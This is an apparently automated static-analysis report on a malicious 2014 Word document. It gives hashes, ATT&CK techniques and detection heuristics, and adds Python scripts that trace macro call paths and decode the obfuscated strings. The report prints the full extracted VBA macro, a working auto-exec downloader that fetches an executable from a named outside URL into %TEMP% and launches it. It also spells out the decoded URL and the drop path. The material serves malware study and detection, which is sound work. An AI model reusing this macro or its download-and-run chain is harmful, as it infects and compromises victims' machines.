Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8a290719a8dc9f5d…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 44.5 KB
Created: 2014-12-08 21:59:00
Authoring application: Microsoft Office Word
First seen: 2015-01-04
MD5: 7f023b169da30a68c45080b81e6841a3
SHA-1: f2ca52897c9d0dba8a11e364a1422c376cca3776
SHA-256: 8a290719a8dc9f5d2176df101cd93387f6a4bf5d83e256aebbbeaf0c0890c4d0
Risk score: 274

Malware Insights

MITRE ATT&CK
T1566.001 Phishing: Spearphishing Attachment
T1059.005 Command and Scripting Interpreter: Visual Basic
Also applicable from the decoded macro behaviour (added on review, not in the original mapping):
T1204.002 User Execution: Malicious File
T1027 Obfuscated Files or Information
T1105 Ingress Tool Transfer

The sample is a Word document (the extracted module is ThisDocument, and the metadata names Microsoft Office Word) whose VBA project is an obfuscated auto-exec downloader. Every sensitive string is stored as a reversed hex literal and rebuilt at runtime by HexToString(StrReverse(...)); decoding those literals from the extracted macros.bas shows the loader creating MSXML2.XMLHTTP, issuing a GET to http://progresser-en-photo.com/js/bin.exe, writing the response body to %TEMP%\EXXQJIULSJO.exe and launching it through Shell.Application.Open. The rest of the module is padding: nested For loops over randomly named Integer counters that do nothing but call DoEvents, which inflate the source and break simple signatures without changing behaviour. Three entry points are present, AutoOpen (the one Word honours) plus Auto_Open and Workbook_Open (Excel triggers), and all converge on the same routine. The ClamAV signature Doc.Downloader.Generic agrees with the downloader classification. Delivery was most likely a spearphishing attachment; the report itself holds no evidence of the delivery vector.

Heuristics (11)

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This loader shape keeps the ProgID, URL and file-path strings out of the macro source: the CreateObject call itself is visible, but its argument and everything passed to the HTTP and file-system calls exist only as encoded literals until the decoder runs. Here the decoder is HexToString applied to StrReverse output, i.e. each literal is a reversed hex string.
    Matched line in script
        Set QUGESAIDFJZ = CreateObject(HexToString(StrReverse("05454584C4D485E223C4D48535D4")))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set QUGESAIDFJZ = CreateObject(HexToString(StrReverse("05454584C4D485E223C4D48535D4")))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro (Word automatic macro; this is the entry point that fires when the document is opened in Word with macros enabled, and it calls Auto_Open)
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro (Excel ThisWorkbook event; it does not fire in this Word document and only chains to Auto_Open)
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro (Excel automatic macro; in Word it runs only because AutoOpen calls it, and it in turn calls the loader routine DLKUMLWKOEG)
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access); the encoded argument decodes to "TEMP", so the downloaded file is written under %TEMP% before it is launched
    Matched line in script
        RDQTLNGJUGF HexToString(StrReverse("568756E2E69626F237A6F2D6F636E2F647F68607D2E656D227563737562776F62707F2F2A307474786")), Environ(HexToString(StrReverse("05D45445"))) & HexToString(StrReverse("568756E2F4A435C45594A415858554C5"))
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Caveat for this sample: the description does not hold here, since olevba did recover a full VBA module (macros.bas below, with Sub AutoOpen in it), so this marker most likely fired on the AutoOpen string and adds no evidence beyond the OLE_VBA_AUTOOPEN finding.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
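To make the relationship between the three auto-exec markers and the execution sinks concrete, here is an added Python example (not part of the report or of the heuristic engine that produced it) that parses VBA source, maps each auto-exec entry point to the host application that honours it, and walks the call graph to the sinks it reaches. The input is a constructed skeleton that keeps the sample's routine names and call structure but omits the padding loops and replaces the encoded literals with "..."; the WORD_AUTOEXEC/EXCEL_AUTOEXEC tables and the sink patterns are my own choices.

```python
import re
from collections import OrderedDict

# Constructed skeleton, not the sample's code: it keeps the routine names and the
# call structure of the extracted macro but drops the padding loops, and the encoded
# literals are replaced by "..." so only control flow and sink tokens remain.
SKELETON_VBA = '''
Sub Auto_Open()
    DLKUMLWKOEG
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub
Sub DLKUMLWKOEG()
    RDQTLNGJUGF HexToString(StrReverse("...")), Environ(HexToString(StrReverse("..."))) & HexToString(StrReverse("..."))
End Sub
Function RDQTLNGJUGF(ByVal KVHTAVKOUAU As String, ByVal UCLTAOWUVMW As String) As Boolean
    Set QUGESAIDFJZ = CreateObject(HexToString(StrReverse("...")))
    QUGESAIDFJZ.Open HexToString(StrReverse("...")), KVHTAVKOUAU, False
    QUGESAIDFJZ.Send HexToString(StrReverse("..."))
    NENMVDKFQUK = QUGESAIDFJZ.responseBody
    Open UCLTAOWUVMW For Binary Access Write As #1
    Put #1, , NENMVDKFQUK
    Close #1
    Set fdgfdgfdg = CreateObject(HexToString(StrReverse("...")))
    fdgfdgfdg.Open UCLTAOWUVMW
End Function
'''

# Which host honours which entry point (my own tables, from the Office documentation).
WORD_AUTOEXEC = {"AutoExec", "AutoNew", "AutoOpen", "AutoClose", "AutoExit",
                 "Document_Open", "Document_New", "Document_Close"}
EXCEL_AUTOEXEC = {"Auto_Open", "Auto_Close", "Workbook_Open", "Workbook_Activate"}

# Sink tokens in the spirit of the heuristic descriptions above; also my own choice.
SINKS = [
    ("com-instantiation", re.compile(r"\bCreateObject\s*\(|\bGetObject\s*\(")),
    ("shell-execution",   re.compile(r"\bShell\s*\(|\.ShellExecute\b|\.Exec\b|\.Run\b")),
    ("http-transfer",     re.compile(r"\.Send\b|\.responseBody\b")),
    ("file-write",        re.compile(r"\bOpen\b.+\bFor\s+Binary\b|\bPut\s+#")),
]

PROC_RE = re.compile(
    r"^[ \t]*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)\b(.*?)^[ \t]*End\s+(?:Sub|Function)",
    re.S | re.M)

def parse_procs(src):
    """Map procedure name -> body text, in definition order."""
    return OrderedDict((m.group(1), m.group(2)) for m in PROC_RE.finditer(src))

def callees(body, procs):
    """Names of defined procedures referenced anywhere in this body."""
    return [n for n in procs if re.search(rf"\b{re.escape(n)}\b", body)]

def trace(entry, procs, chain=None, sinks=None):
    """Depth-first walk from an entry point; returns (visit order, sink labels hit)."""
    chain = [] if chain is None else chain
    sinks = [] if sinks is None else sinks
    if entry in chain or entry not in procs:
        return chain, sinks
    chain.append(entry)
    body = procs[entry]
    for label, rx in SINKS:
        if rx.search(body) and label not in sinks:
            sinks.append(label)
    for callee in callees(body, procs):
        trace(callee, procs, chain, sinks)
    return chain, sinks

def report(src):
    """For every auto-exec entry point: the host that fires it, its call chain, its sinks."""
    procs = parse_procs(src)
    result = {}
    for name in procs:
        host = "Word" if name in WORD_AUTOEXEC else "Excel" if name in EXCEL_AUTOEXEC else None
        if host:
            chain, sinks = trace(name, procs)
            result[name] = {"host": host, "chain": chain, "sinks": sinks}
    return result

if __name__ == "__main__":
    for entry, info in report(SKELETON_VBA).items():
        print(f"{entry:14} [{info['host']}] {' -> '.join(info['chain'])} | sinks: {info['sinks']}")
```

On the skeleton, AutoOpen (the only entry point Word honours in a ThisDocument module) reaches CreateObject, .Send/.responseBody and Open For Binary/Put within four hops; Auto_Open and Workbook_Open report the same sinks but are Excel triggers. The Shell.Application launch does not register as a shell sink, because the ProgID is an encoded literal and the .Open method name is shared with XMLHTTP; that is exactly the loader shape OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER describes, and it is why token matching on the raw source has to be paired with string decoding.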

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9199 bytes
SHA-256: 9cf147cab876c3381eda546c6093cd70cf4b2f0dee383f842f9fe41dbd481b30
Detection
ClamAV: No threats found (the Doc.Downloader.Generic hit above is on the OLE container; that signature does not carry over to the decoded VBA text)
Obfuscation or payload: likely
90 of 147 identifiers look randomly generated (e.g. 'RDQTLNGJUGF'), consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function HexToString(ByVal JKTrmPRyEY As String) As String
Dim VBwxvA As String
Dim szPqqFv As String
Dim qPsQUCrLCt As Long
For qPsQUCrLCt = 1 To Len(JKTrmPRyEY) Step 2
Dim rbFhOBZv As Integer
For rbFhOBZv = 0 To 5
Dim fkWPNAwf As Integer
For fkWPNAwf = 0 To 6
DoEvents
Next fkWPNAwf
DoEvents
Next rbFhOBZv
Dim rvGogSPQ As Integer
For rvGogSPQ = 0 To 5
DoEvents
Next rvGogSPQ
VBwxvA = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(JKTrmPRyEY, qPsQUCrLCt, 2)))
Dim HzFdMdeM As Integer
For HzFdMdeM = 0 To 1
Dim lICZEAhN As Integer
For lICZEAhN = 0 To 6
DoEvents
Next lICZEAhN
DoEvents
Next HzFdMdeM
Dim cqajwczp As Integer
For cqajwczp = 0 To 7
DoEvents
Next cqajwczp
szPqqFv = szPqqFv & VBwxvA
Next qPsQUCrLCt
Dim YoIQocll As Integer
For YoIQocll = 0 To 9
Dim GopYarCd As Integer
For GopYarCd = 0 To 8
DoEvents
Next GopYarCd
DoEvents
Next YoIQocll
Dim LQdmLNOx As Integer
For LQdmLNOx = 0 To 8
DoEvents
Next LQdmLNOx
HexToString = szPqqFv
End Function


Sub Auto_Open()
Dim PeTaKRhj As Integer
For PeTaKRhj = 0 To 4
Dim mVBTMefl As Integer
For mVBTMefl = 0 To 4
Dim kmCtnrZn As Integer
For kmCtnrZn = 0 To 6
DoEvents
Next kmCtnrZn
DoEvents
Next mVBTMefl
Dim qinGrqUL As Integer
For qinGrqUL = 0 To 5
DoEvents
Next qinGrqUL
DoEvents
Next PeTaKRhj
Dim uvpHLkDX As Integer
For uvpHLkDX = 0 To 2
Dim KkPaaIcW As Integer
For KkPaaIcW = 0 To 8
DoEvents
Next KkPaaIcW
DoEvents
Next uvpHLkDX
Dim RKWqNXCv As Integer
For RKWqNXCv = 0 To 6
DoEvents
Next RKWqNXCv
DLKUMLWKOEG
End Sub
Sub AutoOpen()
Dim eBaledvl As Integer
For eBaledvl = 0 To 1
Dim HxmCyTMD As Integer
For HxmCyTMD = 0 To 2
Dim LiADfRQC As Integer
For LiADfRQC = 0 To 3
DoEvents
Next LiADfRQC
DoEvents
Next HxmCyTMD
Dim wMsMVeZO As Integer
For wMsMVeZO = 0 To 1
DoEvents
Next wMsMVeZO
DoEvents
Next eBaledvl
Dim OpBIPQBy As Integer
For OpBIPQBy = 0 To 4
Dim pqsWMmqU As Integer
For pqsWMmqU = 0 To 8
DoEvents
Next pqsWMmqU
DoEvents
Next OpBIPQBy
Dim HEUhMGKf As Integer
For HEUhMGKf = 0 To 5
DoEvents
Next HEUhMGKf
    Auto_Open
End Sub
Sub Workbook_Open()
Dim SWhfuEMz As Integer
For SWhfuEMz = 0 To 1
Dim fPOMyfVm As Integer
For fPOMyfVm = 0 To 3
Dim cQVNFqkY As Integer
For cQVNFqkY = 0 To 5
DoEvents
Next cQVNFqkY
DoEvents
Next fPOMyfVm
Dim NcOibOpk As Integer
For NcOibOpk = 0 To 3
DoEvents
Next NcOibOpk
DoEvents
Next SWhfuEMz
Dim uvdRPleD As Integer
For uvdRPleD = 0 To 2
Dim rNOunZYP As Integer
For rNOunZYP = 0 To 1
DoEvents
Next rNOunZYP
DoEvents
Next uvdRPleD
Dim tJvCcYHt As Integer
For tJvCcYHt = 0 To 2
DoEvents
Next tJvCcYHt
    Auto_Open
End Sub

Sub DLKUMLWKOEG()
Dim TOHqMUPE As Integer
For TOHqMUPE = 0 To 9
Dim VAxGPZBI As Integer
For VAxGPZBI = 0 To 9
Dim CQvVmKWw As Integer
For CQvVmKWw = 0 To 9
DoEvents
Next CQvVmKWw
DoEvents
Next VAxGPZBI
Dim inWdKTfm As Integer
For inWdKTfm = 0 To 4
DoEvents
Next inWdKTfm
DoEvents
Next TOHqMUPE
Dim EMKpPXUh As Integer
For EMKpPXUh = 0 To 8
Dim dWIiPcUY As Integer
For dWIiPcUY = 0 To 3
DoEvents
Next dWIiPcUY
DoEvents
Next EMKpPXUh
Dim fJaIdcEW As Integer
For fJaIdcEW = 0 To 3
DoEvents
Next fJaIdcEW
    RDQTLNGJUGF HexToString(StrReverse("568756E2E69626F237A6F2D6F636E2F647F68607D2E656D227563737562776F62707F2F2A307474786")), Environ(HexToString(StrReverse("05D45445"))) & HexToString(StrReverse("568756E2F4A435C45594A415858554C5"))
End Sub
Function RDQTLNGJUGF(ByVal KVHTAVKOUAU As String, ByVal UCLTAOWUVMW As String) As Boolean
     Dim QUGESAIDFJZ As Object, LKELSUATYNM As Long, WJNISNSNALS As Long, NENMVDKFQUK() As Byte

Dim ppnwjoOK As Integer
For ppnwjoOK = 0 To 2
Dim qzoMTkuU As Integer
For qzoMTkuU = 0 To 8
Dim cTbGsmit As Integer
For cTbGsmit = 0 To 8
DoEvents
Next cTbGsmit
DoEvents
Next qzoMTkuU
Dim fSldnRxE As Integer
For fSldnRxE = 0 To 9
DoEvents
Next fSldnRxE
DoEvents
Next ppnwjoOK
Dim WJyuIDzx As Integer
For WJyuIDzx = 0 To 6
Dim FFFIviwO As Integer
For FFFIviwO = 0 To 4
DoEvents
Next FFFIviwO
DoEvents
Next WJyuIDzx
Dim nlZErlIy As Integer
For nlZErlIy = 0 To 2
DoEvents
Next nlZErlIy
    Set QUGESAIDFJZ = CreateObject(HexToString(StrReverse("05454584C4D485E223C4D48535D4")))
    QUGESAIDFJZ.Open HexToString(StrReverse("455474")), KVHTAVKOUAU, False
Dim GZWJjEjb As Integer
For GZWJjEjb = 0 To 8
Dim QBCHyWzz As Integer
For QBCHyWzz = 0 To 1
Dim qtHZLDsk As Integer
For qtHZLDsk = 0 To 6
DoEvents
Next qtHZLDsk
DoEvents
Next QBCHyWzz
Dim cPtwrYzE As Integer
For cPtwrYzE = 0 To 8
DoEvents
Next cPtwrYzE
DoEvents
Next GZWJjEjb
Dim NhbUdIxe As Integer
For NhbUdIxe = 0 To 4
Dim tLhYarLT As Integer
For tLhYarLT = 0 To 7
DoEvents
Next tLhYarLT
DoEvents
Next NhbUdIxe
Dim ZrMseRIj As Integer
For ZrMseRIj = 0 To 2
DoEvents
Next ZrMseRIj
    QUGESAIDFJZ.Send HexToString(StrReverse("766646764666766646"))


Dim AyLNPGZe As Integer
For AyLNPGZe = 0 To 2
Dim hbRdQmQb As Integer
For hbRdQmQb = 0 To 3
Dim VORRPvvx As Integer
For VORRPvvx = 0 To 9
DoEvents
Next VORRPvvx
DoEvents
Next hbRdQmQb
Dim XMPukTKC As Integer
For XMPukTKC = 0 To 9
DoEvents
Next XMPukTKC
DoEvents
Next AyLNPGZe
Dim lzUaEkvO As Integer
For lzUaEkvO = 0 To 4
Dim ibXsSxlk As Integer
For ibXsSxlk = 0 To 4
DoEvents
Next ibXsSxlk
DoEvents
Next lzUaEkvO
Dim YPAJDXoz As Integer
For YPAJDXoz = 0 To 6
DoEvents
Next YPAJDXoz
    NENMVDKFQUK = QUGESAIDFJZ.responseBody

Dim rKRumflG As Integer
For rKRumflG = 0 To 5
Dim rKAbHPtY As Integer
For rKAbHPtY = 0 To 1
Dim srJRkAlR As Integer
For srJRkAlR = 0 To 3
DoEvents
Next srJRkAlR
DoEvents
Next rKAbHPtY
Dim xLfLGgQR As Integer
For xLfLGgQR = 0 To 4
DoEvents
Next xLfLGgQR
DoEvents
Next rKRumflG
Dim imRdIUJG As Integer
For imRdIUJG = 0 To 2
Dim HAQeZeja As Integer
For HAQeZeja = 0 To 1
DoEvents
Next HAQeZeja
DoEvents
Next imRdIUJG
Dim PhhFypwl As Integer
For PhhFypwl = 0 To 9
DoEvents
Next PhhFypwl
    WJNISNSNALS = FreeFile

    Open UCLTAOWUVMW For Binary Access Write As #WJNISNSNALS
Dim lzSAOeBr As Integer
For lzSAOeBr = 0 To 4
Dim TSbItgBi As Integer
For TSbItgBi = 0 To 3
Dim gDfJiEGE As Integer
For gDfJiEGE = 0 To 9
DoEvents
Next gDfJiEGE
DoEvents
Next TSbItgBi
Dim VUFFJCvs As Integer
For VUFFJCvs = 0 To 4
DoEvents
Next VUFFJCvs
DoEvents
Next lzSAOeBr
Dim okSGuCRm As Integer
For okSGuCRm = 0 To 8
Dim raYlYXmJ As Integer
For raYlYXmJ = 0 To 5
DoEvents
Next raYlYXmJ
DoEvents
Next okSGuCRm
Dim bbBBSZYD As Integer
For bbBBSZYD = 0 To 2
DoEvents
Next bbBBSZYD
    Put #WJNISNSNALS, , NENMVDKFQUK
Dim QaFkkQqJ As Integer
For QaFkkQqJ = 0 To 1
Dim KgNPsfae As Integer
For KgNPsfae = 0 To 8
Dim gOREHCbB As Integer
For gOREHCbB = 0 To 3
DoEvents
Next gOREHCbB
DoEvents
Next KgNPsfae
Dim UZdCYIXa As Integer
For UZdCYIXa = 0 To 6
DoEvents
Next UZdCYIXa
DoEvents
Next QaFkkQqJ
Dim wXiuhGtX As Integer
For wXiuhGtX = 0 To 4
Dim qpjTMiPz As Integer
For qpjTMiPz = 0 To 2
DoEvents
Next qpjTMiPz
DoEvents
Next wXiuhGtX
Dim uQLRpnHa As Integer
For uQLRpnHa = 0 To 2
DoEvents
Next uQLRpnHa
    Close #WJNISNSNALS
Dim IlglHHlr As Integer
For IlglHHlr = 0 To 9
Dim rKweltnT As Integer
For rKweltnT = 0 To 5
Dim PsEGTeGh As Integer
For PsEGTeGh = 0 To 4
DoEvents
Next PsEGTeGh
DoEvents
Next rKweltnT
Dim yHvukYGy As Integer
For yHvukYGy = 0 To 7
DoEvents
Next yHvukYGy
DoEvents
Next IlglHHlr
Dim jcPXTVjJ As Integer
For jcPXTVjJ = 0 To 7
Dim tXVqAFtW As Integer
For tXVqAFtW = 0 To 7
DoEvents
Next tXVqAFtW
DoEvents
Next jcPXTVjJ
Dim NblnLNIn As Integer
For NblnLNIn = 0 To 4
DoEvents
Next NblnLNIn
    
Dim BkjovcRK As Integer
For BkjovcRK = 0 To 6
Dim KdozPmWR As Integer
For KdozPmWR = 0 To 2
Dim nlmvNYJM As Integer
For nlmvNYJM = 0 To 8
DoEvents
Next nlmvNYJM
DoEvents
Next KdozPmWR
Dim rzxsuBll As Integer
For rzxsuBll = 0 To 4
DoEvents
Next rzxsuBll
DoEvents
Next BkjovcRK
Dim JxgRkAft As Integer
For JxgRkAft = 0 To 1
Dim inLnZXeK As Integer
For inLnZXeK = 0 To 2
DoEvents
Next inLnZXeK
DoEvents
Next JxgRkAft
Dim QuNVUcuP As Integer
For QuNVUcuP = 0 To 7
DoEvents
Next QuNVUcuP
Set fdgfdgfdg = CreateObject(HexToString(StrReverse("E6F69647163696C6070714E2C6C6568635")))
fdgfdgfdg.Open Environ(HexToString(StrReverse("05D45445"))) & HexToString(StrReverse("568756E2F4A435C45594A415858554C5"))
Dim piDcXsCJ As Integer
For piDcXsCJ = 0 To 8
Dim QaIyLQAK As Integer
For QaIyLQAK = 0 To 7
Dim jnjQszjd As Integer
For jnjQszjd = 0 To 4
DoEvents
Next jnjQszjd
DoEvents
Next QaIyLQAK
Dim DMtUQQGh As Integer
For DMtUQQGh = 0 To 1
DoEvents
Next DMtUQQGh
DoEvents
Next piDcXsCJ
Dim psfPMqkE As Integer
For psfPMqkE = 0 To 2
Dim fHBacWtK As Integer
For fHBacWtK = 0 To 3
DoEvents
Next fHBacWtK
DoEvents
Next psfPMqkE
Dim ibBzwrxk As Integer
For ibBzwrxk = 0 To 2
DoEvents
Next ibBzwrxk
     
End Function
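The OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER finding describes the string decoder, and the preview above shows it alongside the padding loops that account for most of the 147 identifiers. The following Python script is an added example, not part of the report or of the oletools/olevba pipeline that produced macros.bas: it strips the padding, re-implements HexToString(StrReverse(...)) and rewrites each encoded literal in place, then lifts the indicators out of the cleaned source. The input is a short excerpt of the preview with most padding loops elided; every encoded literal in it is copied from the script above. The padding-detection rule (an Integer Dim immediately followed by a For with literal bounds) is my own heuristic.

```python
import re

# Excerpt of the macros.bas preview above (the two routines that do the work). Every
# encoded literal is copied verbatim from the extracted script; most padding loops are
# elided to keep the sample short, two are left in to exercise the stripper.
SAMPLE_VBA = '''
Sub DLKUMLWKOEG()
Dim TOHqMUPE As Integer
For TOHqMUPE = 0 To 9
Dim VAxGPZBI As Integer
For VAxGPZBI = 0 To 9
DoEvents
Next VAxGPZBI
DoEvents
Next TOHqMUPE
    RDQTLNGJUGF HexToString(StrReverse("568756E2E69626F237A6F2D6F636E2F647F68607D2E656D227563737562776F62707F2F2A307474786")), Environ(HexToString(StrReverse("05D45445"))) & HexToString(StrReverse("568756E2F4A435C45594A415858554C5"))
End Sub
Function RDQTLNGJUGF(ByVal KVHTAVKOUAU As String, ByVal UCLTAOWUVMW As String) As Boolean
     Dim QUGESAIDFJZ As Object, LKELSUATYNM As Long, WJNISNSNALS As Long, NENMVDKFQUK() As Byte
    Set QUGESAIDFJZ = CreateObject(HexToString(StrReverse("05454584C4D485E223C4D48535D4")))
    QUGESAIDFJZ.Open HexToString(StrReverse("455474")), KVHTAVKOUAU, False
    QUGESAIDFJZ.Send HexToString(StrReverse("766646764666766646"))
    NENMVDKFQUK = QUGESAIDFJZ.responseBody
    WJNISNSNALS = FreeFile
    Open UCLTAOWUVMW For Binary Access Write As #WJNISNSNALS
    Put #WJNISNSNALS, , NENMVDKFQUK
    Close #WJNISNSNALS
Set fdgfdgfdg = CreateObject(HexToString(StrReverse("E6F69647163696C6070714E2C6C6568635")))
fdgfdgfdg.Open Environ(HexToString(StrReverse("05D45445"))) & HexToString(StrReverse("568756E2F4A435C45594A415858554C5"))
End Function
'''

def hex_to_string(reversed_hex):
    """Python twin of the macro's HexToString(StrReverse(x)): undo the reversal, then
    read each two-character chunk as a hex byte (the VBA does Chr$(Val("&H" & pair)))."""
    return bytes.fromhex(reversed_hex[::-1]).decode("latin-1")

ENCODED_CALL = re.compile(r'HexToString\(StrReverse\("([0-9A-Fa-f]+)"\)\)')

def decode_literals(src):
    """Replace every HexToString(StrReverse("...")) call with the plain string it yields."""
    return ENCODED_CALL.sub(lambda m: '"' + hex_to_string(m.group(1)) + '"', src)

JUNK_DIM = re.compile(r'^\s*Dim (\w+) As Integer\s*$')
JUNK_FOR = re.compile(r'^\s*For (\w+) = \d+ To \d+\s*$')
JUNK_NEXT = re.compile(r'^\s*Next (\w+)\s*$')

def strip_padding(src):
    """Drop the padding: a 'Dim X As Integer' immediately followed by 'For X = n To m'
    marks X as a junk counter; its Dim/For/Next lines, every bare DoEvents and blank
    lines are removed. HexToString's real loop (Long counter, Len() bound) survives."""
    lines = src.splitlines()
    junk = set()
    for a, b in zip(lines, lines[1:]):
        d, f = JUNK_DIM.match(a), JUNK_FOR.match(b)
        if d and f and d.group(1) == f.group(1):
            junk.add(d.group(1))
    kept = []
    for line in lines:
        if line.strip() == "DoEvents" or not line.strip():
            continue
        m = JUNK_DIM.match(line) or JUNK_FOR.match(line) or JUNK_NEXT.match(line)
        if m and m.group(1) in junk:
            continue
        kept.append(line)
    return "\n".join(kept)

def deobfuscate(src):
    """Padding removal followed by literal decoding; the result is readable VBA."""
    return decode_literals(strip_padding(src))

def extract_iocs(decoded):
    """Pull the network, COM and file-system indicators out of decoded source."""
    drops = [f"%{env}%{tail}" for env, tail in
             re.findall(r'Environ\("(\w+)"\) & "([^"]+)"', decoded)]
    return {
        "urls": sorted(set(re.findall(r'https?://[^\s"]+', decoded))),
        "progids": sorted(set(re.findall(r'CreateObject\("([^"]+)"\)', decoded))),
        "drop_paths": sorted(set(drops)),
    }

if __name__ == "__main__":
    clean = deobfuscate(SAMPLE_VBA)
    print(clean)
    print(extract_iocs(clean))
```

On the excerpt the decoded source reads: CreateObject("MSXML2.XMLHTTP"), a GET to http://progresser-en-photo.com/js/bin.exe with a junk request body, a binary write to Environ("TEMP") & "\EXXQJIULSJO.exe", then CreateObject("Shell.Application") and .Open on that path. Run against the full macros.bas, the stripper leaves HexToString's own loop alone because its counter is declared As Long and its bound is Len(...), not a literal. The URL and path are indicators from this 2014 sample only; both are attacker-controlled values.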